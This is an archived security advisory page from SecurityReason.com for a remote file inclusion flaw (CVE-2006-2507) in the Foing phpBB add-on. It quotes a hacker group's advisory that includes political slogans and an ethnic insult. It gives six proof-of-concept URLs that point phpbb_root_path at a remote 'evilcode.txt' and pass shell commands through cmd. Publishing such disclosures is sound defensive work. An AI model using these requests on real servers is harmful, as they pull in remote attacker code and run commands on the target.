SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Foing Remote File Include Vulnerability [PHPBB]


Arrow  SecurityAlert : 932
Arrow  CVE : CVE-2006-2507
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : botan
Arrow  Published : 23.05.2006

Arrow  Affected Software : Foing



Arrow  Advisory Content :  

# Kurdish Security Advisory

# Original Advisory :
http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-rem
ote-file.html

# Foing Remote File Include Vulnerability [PHPBB] :}

# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz
." Abdullah Ocalan

# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan
(at) linuxmail (dot) org [email concealed]

# Risk : High

# Class : Remote

# Script : Foing

# Script Website : http://foing.sourceforge.net/

# Version : Foing 0.7.0

0.6.0

0.5.0

0.4.0

0.3.0

0.2.0

# w0rkz : "Powered by foing 0.7.0 © 2003, 2004 Foing Group"

"Powered by foing 0.6.0 © 2003, 2004 Foing Group" etc..

# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers,
Kurdistan Cyber Army etc..

# Special Bitch : Turkish LameRz :]

------------------------------------------------------------------------
--------

# cmd shell example:

# cmd shell variable: ($_GET[cmd]);

Vulnerable code :

Get along at directory config.php

did you meet of ..

<?php

define('FOING_INSTALLED', true);

$phpbb_root_path = '../';

$foing_prefix = $table_prefix;

?>

Proof Of Concept :

http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilco
de.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcod
e.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode
.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcod
e.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evil
code.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evi
lcode.txt?&cmd=uname -a





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.